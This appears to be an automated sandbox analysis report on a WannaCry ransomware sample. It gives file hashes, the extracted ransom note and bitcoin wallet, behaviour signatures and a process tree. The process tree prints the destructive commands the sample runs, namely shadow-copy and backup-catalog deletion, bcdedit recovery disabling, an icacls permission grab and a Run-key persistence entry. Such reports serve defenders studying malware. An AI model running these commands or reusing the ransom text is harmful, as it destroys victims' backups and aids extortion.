Overview

overview

10

Static

static

WannaCry.EXE

windows7_x64

10

WannaCry.EXE

windows10_x64

10

Resubmissions

18-07-2022 04:40

220718-faqj6ahdd3 1

09-07-2022 10:37

220709-mn992sgcd4 10

08-07-2022 15:34

220708-sz77qaadf8 10

20-06-2022 11:39

220620-nsq8eacgfk 10

13-06-2022 10:07

220613-l5wmjsbff6 10

12-06-2022 12:47

220612-p1kw2acbbp 10

12-06-2022 07:39

220612-jg55zagca5 10

11-06-2022 20:25

220611-y7pcgabdf5 10

11-06-2022 20:25

220611-y7fekabde7 10

11-06-2022 20:24

220611-y642jafber 1

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    21-12-2021 13:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WannaCry.EXE

  • Size

    3.4MB

  • MD5

    84c82835a5d21bbcf75a61706d8ab549

  • SHA1

    5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

  • SHA256

    ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

  • SHA512

    90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Score
10/10
wannacrydiscoverypersistenceransomwarespywarestealerworm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Executes dropped EXE 16 IoCs
  • Modifies extensions of user files 17 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops startup file 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\WannaCry.EXE
    "C:\Users\Admin\AppData\Local\Temp\WannaCry.EXE"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Sets desktop wallpaper using registry
    • Suspicious use of WriteProcessMemory
    PID:4248
    • C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      2⤵
      • Views/modifies file attributes
      PID:2124
    • C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:4012
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      taskdl.exe
      2⤵
      • Executes dropped EXE
      PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 62901639289823.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4444
      • C:\Windows\SysWOW64\cscript.exe
        cscript.exe //nologo m.vbs
        3⤵
          PID:660
      • C:\Users\Admin\AppData\Local\Temp\@[email protected]
        @[email protected] co
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2588
        • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
          TaskData\Tor\taskhsvc.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:2272
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c start /b @[email protected] vs
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Users\Admin\AppData\Local\Temp\@[email protected]
          @[email protected] vs
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2796
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin delete shadows /all /quiet
              5⤵
              • Interacts with shadow copies
              PID:3640
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic shadowcopy delete
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2600
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1340
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pqrcgiobwmzdqtd497" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3756
        • C:\Windows\SysWOW64\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "pqrcgiobwmzdqtd497" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:4880
      • C:\Users\Admin\AppData\Local\Temp\@[email protected]
        @[email protected]
        2⤵
        • Executes dropped EXE
        • Sets desktop wallpaper using registry
        • Suspicious use of SetWindowsHookEx
        PID:4972
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:4868
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1380
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:1568
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2460
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:3060
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3284
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:4988
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2000

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2272-191-0x00000000728B0000-0x0000000072ACC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2272-193-0x0000000072C80000-0x0000000072D02000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2272-204-0x0000000072BB0000-0x0000000072BD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2272-189-0x0000000072D10000-0x0000000072D92000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2272-205-0x0000000000C90000-0x0000000000F8E000-memory.dmp

      Filesize

      3.0MB

      Download

    • memory/2272-203-0x0000000072C80000-0x0000000072D02000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2272-202-0x00000000728B0000-0x0000000072ACC000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2272-201-0x0000000072D10000-0x0000000072D92000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2272-196-0x0000000072BB0000-0x0000000072BD2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2272-197-0x0000000000C90000-0x0000000000F8E000-memory.dmp

      Filesize

      3.0MB

      Download

    • memory/4248-153-0x0000000010001000-0x0000000010007000-memory.dmp

      Filesize

      24KB

      Download

    • memory/4248-154-0x0000000010007000-0x000000001000C000-memory.dmp

      Filesize

      20KB

      Download

    • memory/4248-155-0x000000001000E000-0x000000001000F000-memory.dmp

      Filesize

      4KB

      Download